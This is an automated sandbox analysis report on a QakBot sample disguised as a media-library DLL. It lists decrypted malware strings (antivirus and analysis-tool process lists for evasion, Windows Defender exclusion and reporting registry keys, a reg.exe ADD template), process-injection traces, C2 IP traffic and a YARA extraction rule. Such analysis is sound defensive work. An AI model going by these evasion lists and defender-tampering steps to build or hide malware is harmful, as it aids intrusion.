            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Caption,Description,Vendor,Version,InstallDate,InstallSource,PackageName
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %u.%u.%u.%u.%u.%u.%04x
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\explorer.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SystemRoot
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: cscript.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: MBAMService.exe;mbamgui.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\System32\xwizard.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\System32\wermgr.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: AvastSvc.exe;aswEngSrv.exe;aswToolsSvc.exe;afwServ.exe;aswidsagent.exe;AvastUI.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: C:\INTERNAL\__empty
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: .dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Win32_PhysicalMemory
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: ALLUSERSPROFILE
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: image/jpeg
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: LocalLow
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: displayName
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Mozilla/5.0 (Windows NT 6.1; rv:77.0) Gecko/20100101 Firefox/77.0
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: shlwapi.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\WerFault.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: CommandLine
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: {%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: kernel32.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SubmitSamplesConsent
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: 1234567890
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: wbj.go
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\wextract.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Win32_DiskDrive
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: vkise.exe;isesrv.exe;cmdagent.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: System32
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Name
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\System32\WerFault.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: WRSA.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: c:\\
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SpyNetReporting
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: FALSE
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: aswhookx.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Packages
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SonicWallClientProtectionService.exe;SWDash.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: application/x-shockwave-flash
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Sophos UI.exe;SophosUI.exe;SAVAdminService.exe;SavService.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: RepUx.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\System32\mspaint.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Winsta0
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: CynetEPS.exe;CynetMS.exe;CynetConsole.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\wermgr.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %ProgramFiles(x86)%\Internet Explorer\iexplore.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: avp.exe;kavtray.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: root\SecurityCenter2
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\backgroundTaskHost.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: MsMpEng.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\System32\CertEnrollCtrl.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: userenv.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: csc_ui.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: frida-winjector-helper-32.exe;frida-winjector-helper-64.exe;tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe;qak_proxy;dumpcap.exe;CFF Explorer.exe;not_rundll32.exe;ProcessHacker.exe;tcpview.exe;filemon.exe;procmon.exe;idaq64.exe;loaddll32.exe;PETools.exe;ImportREC.exe;LordPE.exe;SysInspector.exe;proc_analyzer.exe;sysAnalyzer.exe;sniff_hit.exe;joeboxcontrol.exe;joeboxserver.exe;ResourceHacker.exe;x64dbg.exe;Fiddler.exe;sniff_hit.exe;sysAnalyzer.exe;BehaviorDumper.exe;processdumperx64.exe;anti-virus.EXE;sysinfoX64.exe;sctoolswrapper.exe;sysinfoX64.exe;FakeExplorer.exe;apimonitor-x86.exe;idaq.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: \\.\pipe\
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: pstorec.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: NTUSER.DAT
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: from
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\System32\sethc.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: netapi32.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\System32\Utilman.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: gdi32.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: setupapi.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SELECT * FROM Win32_Processor
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: iphlpapi.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Caption
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: CrAmTray.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: ccSvcHst.exe;NortonSecurity.exe;nsWscSvc.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Win32_ComputerSystem
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\System32\backgroundTaskHost.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %ProgramFiles%\Internet Explorer\iexplore.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: user32.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: xagtnotif.exe;AppUIMonitor.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\System32\dxdiag.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SentinelServiceHost.exe;SentinelStaticEngine.exe;SentinelAgent.exe;SentinelStaticEngineScanner.exe;SentinelUI.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: \sf2.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\grpconv.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: egui.exe;ekrn.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Software\Microsoft
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %S.%06d
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: bcrypt.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SELECT * FROM AntiVirusProduct
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\SndVol.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\explorer.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\Utilman.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SOFTWARE\Microsoft\Windows Defender\SpyNet
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: wtsapi32.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\xwizard.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: shell32.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: TRUE
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Win32_Bios
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: SELECT * FROM Win32_OperatingSystem
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\mobsync.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: c:\hiberfil.sysss
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: */*
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\AtBroker.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: abcdefghijklmnopqrstuvwxyz
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: ByteFence.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: type=0x%04X
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: snxhk_border_mywnd
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: ROOT\CIMV2
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: dwengine.exe;dwarkdaemon.exe;dwwatcher.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: https
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\explorer.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: fshoster32.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: kernelbase.dll
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: regsvr32.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %s\system32\
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: %SystemRoot%\SysWOW64\dxdiag.exe
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Content-Type: application/x-www-form-urlencoded
            Source: 17.2.rundll32.exe.4940000.1.unpackString decryptor: Win32_Process
            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_10035030 mv_get_random_seed,BCryptOpenAlgorithmProvider,BCryptGenRandom,BCryptCloseAlgorithmProvider,mvpriv_open,_read,_close,mvpriv_open,_read,_close,clock,clock,mv_sha_init,mv_sha_update,mv_sha_final,mv_log,abort,3_2_10035030
            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_1000C0B0 mv_cast5_crypt2,3_2_1000C0B0
            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_1000B0D0 mv_camellia_crypt,3_2_1000B0D0
            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_10013100 mv_encryption_init_info_alloc,mv_mallocz,mv_mallocz,mv_mallocz,mv_mallocz,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_calloc,3_2_10013100
            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_1000C1B0 mv_cast5_crypt,3_2_1000C1B0
            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_100132D0 mv_encryption_init_info_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,mv_free,3_2_100132D0
            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_10002480 mv_aes_ctr_crypt,mv_aes_crypt,3_2_10002480
            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_10013480 mv_encryption_init_info_get_side_data,mv_encryption_init_info_alloc,mv_free,mv_free,mv_free,mv_free,mv_free,3_2_10013480
            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_100084B0 mv_blowfish_crypt,mv_blowfish_crypt_ecb,mv_blowfish_crypt_ecb,3_2_100084B0
            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_10002523 mv_aes_crypt,3_2_10002523
            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_1001363B mv_encryption_init_info_alloc,3_2_1001363B
            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_1000867B mv_blowfish_crypt_ecb,3_2_1000867B
            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_100136FB mv_encryption_init_info_alloc,3_2_100136FB
            Source: F072.dll, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
            Source: unknown, HTTPS traffic detected: 68.87.41.40:443 -> 192.168.2.5:49731 version: TLS 1.2
            Source: F072.dll, Static PE information: DYNAMIC_BASE, NX_COMPAT
            Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 17_2_04949DA8 FindFirstFileW,FindNextFileW,17_2_04949DA8

            Networking

            Source: Joe Sandbox ViewASN Name: MEO-RESIDENCIALPT MEO-RESIDENCIALPT
            Source: Joe Sandbox ViewASN Name: ASN-CXA-ALL-CCI-22773-RDCUS ASN-CXA-ALL-CCI-22773-RDCUS
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Joe Sandbox ViewIP Address: 2.82.8.80 2.82.8.80
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xfinity.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: xfinity.comCache-Control: no-cacheCookie: xpgn=1
            Source: global trafficTCP traffic: 192.168.2.5:49748 -> 85.57.212.13:3389
            Source: unknownNetwork traffic detected: IP country count 30
            Source: unknownTCP traffic detected without corresponding DNS query: 124.122.47.148
            Source: unknownTCP traffic detected without corresponding DNS query: 85.57.212.13
            Source: national[1].htm.24.drString found in binary or memory: Find tutorials and demos\u003C\u002Fa\u003E\u003C\u002Fli\u003E\u003Cli\u003E\u003Ca rel=\"nofollow\" href=\"https:\u002F\u002Fwww.facebook.com\u002Fxfinity\"\u003EFacebook equals www.facebook.com (Facebook)
            Source: Amcache.hve.8.drString found in binary or memory: http://upx.sf.net
            Source: rundll32.exe, rundll32.exe, 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000004.00000002.399211143.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.407006224.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000E.00000002.414998004.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000010.00000002.414998450.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 00000011.00000002.419061010.00000000100AE000.00000002.00000001.01000000.00000003.sdmp, F072.dllString found in binary or memory: https://streams.videolan.org/upload/
            Source: national[1].htm.24.drString found in binary or memory: https://www.xfinity.com/learn/internet-service/acp
            Source: national[1].htm.24.drString found in binary or memory: https://www.xfinity.com/mobile/policies/broadband-disclosures
            Source: national[1].htm.24.drString found in binary or memory: https://www.xfinity.com/networkmanagement
            Source: unknownDNS traffic detected: queries for: xfinity.com
            Source: unknownHTTPS traffic detected: 68.87.41.40:443 -> 192.168.2.5:49731 version: TLS 1.2
            Source: loaddll32.exe, 00000000.00000002.409804519.000000000123B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: F072.dllStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
            Source: 17.2.rundll32.exe.4940000.1.unpack, type: UNPACKEDPEMatched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
            Source: 17.2.rundll32.exe.2c51168.0.unpack, type: UNPACKEDPEMatched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
            Source: 17.2.rundll32.exe.2c51168.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QakBot_ConfigExtraction_Feb23 cape_options = bp0=$params+23,action0=setdump:eax::ecx,bp1=$c2list1+40,bp1=$c2list2+38,action1=dump,bp2=$conf+13,action2=dump,count=1,typestring=QakBot Config, date = 2023-02-17, author = kevoreilly, description = QakBot Config Extraction, reference = https://github.com/kevoreilly/CAPEv2/blob/master/analyzer/windows/data/yara/QakBot.yar, license = https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE, packed = f084d87078a1e4b0ee208539c53e4853a52b5698e98f0578d7c12948e3831a68
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5236 -s 664
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0494A412 NtAllocateVirtualMemory,NtWriteVirtualMemory,17_2_0494A412
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0494A823 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,17_2_0494A823
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0494CA0F NtAllocateVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,NtFreeVirtualMemory,17_2_0494CA0F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_049543F4 NtProtectVirtualMemory,NtProtectVirtualMemory,17_2_049543F4
            Source: F072.dllBinary or memory string: OriginalFilenameavutil-lav-57.dll. vs F072.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: schannel.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: ntasn1.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\wermgr.exeSection loaded: ncryptsslp.dll
            Source: F072.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\F072.dll"
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\F072.dll",#1
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\F072.dll,mv_add_i
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F072.dll",#1
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5236 -s 664
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5240 -s 664
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\F072.dll,mv_add_q
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\F072.dll,mv_add_stable
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5708 -s 652
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F072.dll",mv_add_i
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F072.dll",mv_add_q
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F072.dll",mv_add_stable
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F072.dll",next
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F072.dll",mvutil_license
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\F072.dll",mvutil_configuration
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 652
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4732 -s 652
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\wermgr.exe C:\Windows\SysWOW64\wermgr.exe
            Source: C:\Windows\SysWOW64\wermgr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Ixayi
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF92.tmp
            Source: classification engineClassification label: mal100.troj.evad.winDLL@31/23@2/100
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0494D213 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,17_2_0494D213
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 17_2_0494C71C CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,17_2_0494C71C
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5240
            Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\{26CAAE63-F26A-4151-91F8-5B190E00B3CB}
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5708
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2528:120:WilError_01
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5236
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4696
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4732
            Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\{E98255E4-990A-4ADC-9ACC-3D92A2E78CDC}
            Source: C:\Windows\SysWOW64\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{26CAAE63-F26A-4151-91F8-5B190E00B3CB}
            Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\SysWOW64\wermgr.exeFile read: C:\Windows\System32\drivers\etc\hosts
            Source: F072.dllStatic PE information: More than 582 > 100 exports found
            Source: F072.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001F523 mv_dict_get,LoadLibraryA,LoadLibraryA,InitOnceBeginInitialize,InitOnceComplete,LoadLibraryA,GetProcAddress,mv_log,atoi,mv_log,mv_log,GetProcAddress,3_2_1001F523
            Source: F072.dllStatic PE information: real checksum: 0xf1b7b should be: 0xf2fd9

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6828 base: 1093C50 value: E9 63 D7 69 FF
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
